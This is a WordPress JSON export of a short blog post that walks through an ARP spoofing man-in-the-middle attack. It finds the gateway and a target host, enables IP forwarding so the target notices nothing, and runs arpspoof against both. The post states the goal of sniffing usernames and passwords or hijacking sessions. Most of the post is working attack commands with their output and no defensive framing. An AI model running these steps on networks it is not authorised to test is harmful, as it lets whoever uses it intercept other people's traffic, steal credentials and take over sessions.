This technique creates a Man-In-The-Middle situation, so that we can modifiy the communication in any way we want or just listen to it with a sniffer to find out usernames\/passwords or hijack sessions.<\/p>\n
1. First we have to find out the ip address of the router\/gateway.<\/p>\n
\r\n$ ip route\r\n\r\ndefault via 192.168.2.1 dev eth0 proto dhcp metric 600 \r\n192.168.2.0\/24 dev eth0 proto kernel scope link src 192.168.2.106 metric 600\r\n<\/pre>\n2. Now we have to find out the ip address of our target.<\/p>\n
\r\n$ netdiscover -r 192.168.2.0\/24\r\n\r\nCurrently scanning: Finished! | Screen View: Unique Hosts \r\n \r\n5 Captured ARP Req\/Rep packets, from 2 hosts. Total size: 228 \r\n_____________________________________________________________________________\r\n IP At MAC Address Count Len MAC Vendor \/ Hostname \r\n-----------------------------------------------------------------------------\r\n192.168.2.1 9c:80:df:4f:df:e0 4 168 Arcadyan Technology Corporat\r\n192.168.2.117 bc:5f:f4:83:b1:2e 1 60 ASRock Incorporation \r\n<\/pre>\n3. To let the target know nothing, just forward the communication.<\/p>\n
\r\n$ echo 1 > \/proc\/sys\/net\/ipv4\/ip_forward\r\n<\/pre>\n4. Start with the arp spoofing, to receive all the communication happens.<\/p>\n
\r\n$ arpspoof -i eth0 -t 192.168.2.117 -r 192.168.2.1\r\n\r\n78:e4:0:93:ec:44 bc:5f:f4:83:b1:2e 0806 42: arp reply 192.168.2.1 is-at 78:e4:0:93:ec:44\r\n78:e4:0:93:ec:44 9c:80:df:4f:df:e0 0806 42: arp reply 192.168.2.117 is-at 78:e4:0:93:ec:44\r\n78:e4:0:93:ec:44 bc:5f:f4:83:b1:2e 0806 42: arp reply 192.168.2.1 is-at 78:e4:0:93:ec:44\r\n78:e4:0:93:ec:44 9c:80:df:4f:df:e0 0806 42: arp reply 192.168.2.117 is-at 78:e4:0:93:ec:44\r\n...\r\n<\/pre>\nNow we are sending non stop unrequested arp resonses to the router\/gateway and to the target. We are telling the router\/gateway that our mac address is the new one from the target and to the target that our mac address is the new one from the router.<\/p>\n","protected":false},"excerpt":{"rendered":"
This technique creates a Man-In-The-Middle situation, so that we can modifiy the communication in any way we want or just<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false},"categories":[26],"tags":[],"_links":{"self":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts\/1259"}],"collection":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1259"}],"version-history":[{"count":1,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts\/1259\/revisions"}],"predecessor-version":[{"id":16955,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts\/1259\/revisions\/16955"}],"wp:attachment":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1259"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1259"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1259"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}